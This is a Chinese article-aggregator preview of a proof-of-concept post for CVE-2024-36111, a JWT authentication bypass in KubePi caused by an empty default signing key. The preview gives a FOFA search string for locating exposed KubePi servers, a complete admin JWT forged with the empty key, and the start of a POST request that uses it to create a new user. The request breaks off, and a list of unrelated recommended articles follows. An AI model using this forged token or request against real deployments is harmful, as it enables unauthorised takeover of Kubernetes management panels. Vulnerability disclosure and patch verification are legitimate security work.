CVE-2024-36111 POC

HACK之道 · 公众号 · · 2024-08-02 17:58

文章预览

KubePi存在JWT验证绕过漏洞 kubepi jwttoken 校验存在缺陷，默认配置文件中jwt密钥为空，虽然读取配置文件相关逻辑中检测到密钥为空时，会生成一个随机32位字符串覆盖配置文件中的密钥，但是实际校验时，密钥为空，使用空密钥生成jwttoken可绕过登录校验，可直接接管后台 fofa "kubepi" poc 使用空密钥生成jwt token eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiYWRtaW4iLCJuaWNrTmFtZSI6IkFkbWluaXN0cmF0b3IiLCJlbWFpbCI6InN1cHBvcnRAZml0MmNsb3VkLmNvbSIsImxhbmd1YWdlIjoiemgtQ04iLCJyZXNvdXJjZVBlcm1pc3Npb25zIjp7fSwiaXNBZG1pbmlzdHJhdG9yIjp0cnVlLCJtZmEiOnsiZW5hYmxlIjpmYWxzZSwic2VjcmV0IjoiIiwiYXBwcm92ZWQiOmZhbHNlfSwiaWF0IjoxNzE2NDQ3MDEyLCJleHAiOjE3MjI0NDcwMTJ9.dedNLwXZu0JY1sgGBCRZmpFvAnLdHjxdPmKWXA7LCf4 使用生成的密钥创建用户tang POST /kubepi/api/v1/users HTTP/ 1.1 Host: 127.0 .0 .1 : 9982 Content-Length: 248 sec-ch-ua: Accept: application/json, text/plain, * /* lang: zh-CN Content-Ty ………………………………

原文地址：访问原文地址
快照地址：访问文章快照
总结与预览地址：访问总结与预览

分享到微博

推荐文章

莓辣MAYLOVE · 12.20 长效HIV预防针剂为本年度十大科学突破之首

23 小时前

卢克文工作室 · 红包界的“劳斯*斯”！把「118国118张外币」塞进红包，隔壁小孩都羡慕哭了！

3 天前

参考消息 · 多人主动投靠境外间谍组织，国安出手！

5 天前

参考消息 · 俄军挺近“战略目标”，乌前线指挥官被撤

5 天前

漫步五角场 · 互联网 | 阿里国际2025届实习生招聘

5 月前

环球物理 · 【物理课件】高中物理必修三课件汇总

4 天前